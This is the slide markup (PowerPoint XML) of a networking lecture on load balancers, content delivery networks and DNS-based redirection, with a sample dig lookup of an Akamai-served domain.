          <a:xfrm rot="5400000">
            <a:off x="1592751" y="3320354"/>
            <a:ext cx="1014068" cy="394289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4" idx="1"/>
            <a:endCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1973220" y="3334172"/>
            <a:ext cx="1014068" cy="366651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51884" y="4790960"/>
            <a:ext cx="1490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Web Servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="277290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Balancers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7355" y="1478569"/>
            <a:ext cx="7489371" cy="534468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Device that multiplexes requests across a collection of servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All servers share one public IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Balancer transparently directs requests to different servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How should the balancer assign clients to servers?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Random / round-robin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When is this a good idea?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Load-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When might this fail?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scalability (must support traffic for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hosts)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>State (must keep track of previous decisions)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Cloud 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1344368" y="1899010"/>
            <a:ext cx="1905119" cy="136980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Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5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3289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0" y="5333289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080" y="5333289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020" y="5333289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Elbow Connector 9"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="1"/>
            <a:endCxn id="5" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="686349" y="3722709"/>
            <a:ext cx="2065931" cy="1155228"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 7167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4" idx="1"/>
            <a:endCxn id="8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1827759" y="3736527"/>
            <a:ext cx="2065931" cy="1127592"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 7167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4" idx="1"/>
            <a:endCxn id="6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1066819" y="4103179"/>
            <a:ext cx="2065931" cy="394288"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 7198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4" idx="1"/>
            <a:endCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1447289" y="4116997"/>
            <a:ext cx="2065931" cy="366652"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 7167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51884" y="6099717"/>
            <a:ext cx="1490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Web Servers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904229" y="3768753"/>
            <a:ext cx="785396" cy="782267"/>
            <a:chOff x="3121020" y="659031"/>
            <a:chExt cx="4781550" cy="4762500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rounded Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3359801" y="901960"/>
              <a:ext cx="4316958" cy="431695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1020" y="659031"/>
              <a:ext cx="4781550" cy="4762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989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Balancing: Are We Done?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7968"/>
            <a:ext cx="10515600" cy="3810954"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Allows scaling of hardware independent of IPs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relatively easy to maintain</a:t>
            </a:r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Expensive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Still a single point of failure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Location!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 310"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1773826" y="5205550"/>
            <a:ext cx="8644347" cy="920281"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DA1F28"/>
          </a:solidFill>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="6D0F14"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Where do we place the load balancer for Netflix?</a:t>
            </a:r>
            <a:endParaRPr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04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Placement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="image5.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect t="7243" b="7243"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="180392" y="1555102"/>
            <a:ext cx="7369444" cy="425649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7.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect t="7357" r="9792" b="21721"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5919542" y="3200850"/>
            <a:ext cx="868856" cy="9649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8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7253372" y="3091437"/>
            <a:ext cx="4093898" cy="3275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6.png" descr="C:\Users\t0ph3r\Documents\CS 4700\assets\black_server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542237" y="3810396"/>
            <a:ext cx="591926" cy="591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6.png" descr="C:\Users\t0ph3r\Documents\CS 4700\assets\black_server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451770" y="1805847"/>
            <a:ext cx="591926" cy="591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6.png" descr="C:\Users\t0ph3r\Documents\CS 4700\assets\black_server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3494766" y="4591544"/>
            <a:ext cx="591926" cy="591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6.png" descr="C:\Users\t0ph3r\Documents\CS 4700\assets\black_server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6622688" y="2492280"/>
            <a:ext cx="591925" cy="591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6.png" descr="C:\Users\t0ph3r\Documents\CS 4700\assets\black_server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5519990" y="4410632"/>
            <a:ext cx="591926" cy="591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image6.png" descr="C:\Users\t0ph3r\Documents\CS 4700\assets\black_server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7945144" y="4231506"/>
            <a:ext cx="591925" cy="591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image6.png" descr="C:\Users\t0ph3r\Documents\CS 4700\assets\black_server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9117691" y="4314846"/>
            <a:ext cx="591925" cy="591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image6.png" descr="C:\Users\t0ph3r\Documents\CS 4700\assets\black_server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7500384" y="5519006"/>
            <a:ext cx="591925" cy="591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image6.png" descr="C:\Users\t0ph3r\Documents\CS 4700\assets\black_server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8831902" y="5452969"/>
            <a:ext cx="591925" cy="59192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5892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Architecture circa-1992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028" y="2606282"/>
            <a:ext cx="893446" cy="8934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0049" y="1838236"/>
            <a:ext cx="5527191" cy="461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Client Side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869" y="2606282"/>
            <a:ext cx="971550" cy="971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38210" y="1839028"/>
            <a:ext cx="3356610" cy="4608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Server Side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37338" y="1838236"/>
            <a:ext cx="2390775" cy="46166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Protocols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92165" y="4151826"/>
            <a:ext cx="12811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Gopher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>HTTP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91464" y="3838489"/>
            <a:ext cx="1411605" cy="2011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Document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Renderer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64245" y="3838489"/>
            <a:ext cx="1805940" cy="520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HTML Parser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028" y="4322355"/>
            <a:ext cx="1043939" cy="104393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 rot="5400000">
            <a:off x="4849637" y="4653267"/>
            <a:ext cx="2264913" cy="382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Network Protocols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7405753" y="4653267"/>
            <a:ext cx="2264913" cy="382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Network Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="11" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4370185" y="4098686"/>
            <a:ext cx="1420850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55275" y="3711869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HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Elbow Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="1"/>
            <a:endCxn id="10" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1703069" y="4098685"/>
            <a:ext cx="861176" cy="745643"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3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729268" y="4861351"/>
            <a:ext cx="1120841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94799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Speed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7968"/>
            <a:ext cx="5749212" cy="5344680"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Impact on user experience</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Users navigate away from pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Video startup delays</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Impact on revenue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Amazon: increased revenue 1% for every 100ms reduction in PLT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shopzilla:12% increase in revenue by reducing PLT from 6 seconds to 1.2 seconds </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ping from BOS to LAX: ~100ms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="image10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7123495" y="1909654"/>
            <a:ext cx="4516443" cy="451644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1341836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Content Delivery Network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also sometimes called Content Distribution Network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At least half of the world’s bits are delivered by a CDN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Probably closer to 80/90%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Primary Goals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create replicas of content throughout the Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure that replicas are always available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Direct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>clients to replicas that will give good performance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80320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Components of a CDN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Distributed servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usually located inside of other ISPs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often located in IXPs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>High-speed network connecting them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Needed to pull content from the original source if it’s not cached locally</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Glue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Something that binds clients to “nearby” replica servers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07994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CDNs (c. 2019)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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Akamai</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="383540" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>250K+ servers, 1500+ networks, 650+ cities, 110+ countries, every continent, ~25% of all web traffic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limelight</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="383540" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>~80 well-provisioned delivery centers, interconnected via a private fiber-optic network, connected to 900+ networks </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CDNetworks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="383540" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>169 Point of Presence (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PoPs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) on six continents, with over 30 locations in Russia and China</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Others (incl Private and Telco)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="383540" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cloudflare, Google, Facebook, Apple, Netflix, MS, AWS, AT&amp;T, Level3, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>EdgeCast</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs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71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226"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="slow" advTm="159226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CDNs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Akamai</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>147K+ servers, 1200+ networks, 650+ cities, 92 countries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limelight</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Well provisioned delivery centers, interconnected via a private fiber-optic connected to 700+ access networks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Edgecast</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>30+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PoPs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 5 continents, 2000+ direct connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Google, Facebook, AWS, AT&amp;T, Level3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30558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 a CDN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Servers are deployed in clusters for reliability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some may be offline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Could be due to failure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also could be “suspended” (e.g., to save power or for upgrade)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often multiple clusters per location (e.g., in multiple racks)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server locations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Well-connected points of presence (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PoPs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Inside of ISPs (e.g. Comcast, Time Warner)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74382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Clients to Servers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CDNs need a way to send clients to the “best” server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The best server can change over time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And this depends on client location, network conditions, server load, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What existing technology can we use for this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS-based redirection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clients request www.foo.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS server directs client to one or more IPs based on request IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use short TTL to limit the effect of caching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56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Delivery Networks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="D:\Classes\CS 4700\assets\usashap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635" y="1536028"/>
            <a:ext cx="8251371" cy="525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Classes\CS 4700\assets\Netflix-icon-300x1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" t="10621" r="6646" b="14574"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2547225" y="2305474"/>
            <a:ext cx="1567543" cy="6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395" y="2653818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Classes\CS 4700\assets\Netflix-icon-300x1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" t="10621" r="6646" b="14574"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8915383" y="4874504"/>
            <a:ext cx="1567543" cy="6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430" y="4275791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Classes\CS 4700\assets\User Coat Blue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151" y="2305474"/>
            <a:ext cx="920326" cy="92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Classes\CS 4700\assets\User Coat Blue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926" y="4661741"/>
            <a:ext cx="920326" cy="92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938" y="3447059"/>
            <a:ext cx="927338" cy="9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892" y="3194283"/>
            <a:ext cx="927338" cy="9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Left-Right Arrow 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="4388538">
            <a:off x="2123319" y="3808146"/>
            <a:ext cx="1037637" cy="4916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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="6498330">
            <a:off x="8705836" y="3528073"/>
            <a:ext cx="1037637" cy="4916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-Right Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="7506663">
            <a:off x="3255549" y="4447244"/>
            <a:ext cx="704121" cy="491694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-Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19626370">
            <a:off x="8125663" y="2985589"/>
            <a:ext cx="810495" cy="491694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109607" y="4653789"/>
            <a:ext cx="4098226" cy="2072035"/>
            <a:chOff x="404487" y="3333623"/>
            <a:chExt cx="8274022" cy="1523216"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rectangle 19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ontent Placeholder 2"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="404487" y="3496212"/>
              <a:ext cx="8118848" cy="12083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>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>DNS responses may vary based on geography, ISP, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>etc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466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CDN Redirection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/>
              <a:t>cbw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ dig www.fox.com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;; ANSWER SECTION:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>www.fox.com.		510	IN	CNAME	www.fox-rma.com.edgesuite.net.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>www.fox-rma.com.edgesuite.net. 5139 IN	CNAME	a2047.w7.akamai.net.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a2047.w7.akamai.net.	4	IN	A	23.62.96.128</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a2047.w7.akamai.net.	4	IN	A	23.62.96.144</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a2047.w7.akamai.net.	4	IN	A	23.62.96.193</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a2047.w7.akamai.net.	4	IN	A	23.62.96.162</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a2047.w7.akamai.net.	4	IN	A	23.62.96.185</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a2047.w7.akamai.net.	4	IN	A	23.62.96.154</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a2047.w7.akamai.net.	4	IN	A	23.62.96.169</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a2047.w7.akamai.net.	4	IN	A	23.62.96.152</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a2047.w7.akamai.net.	4	IN	A	23.62.96.186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51150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Redirection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Uses existing, scalable DNS infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URLs can stay essentially the same</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limitations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS servers see only the Local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nameservers</a:t>
            </a:r>
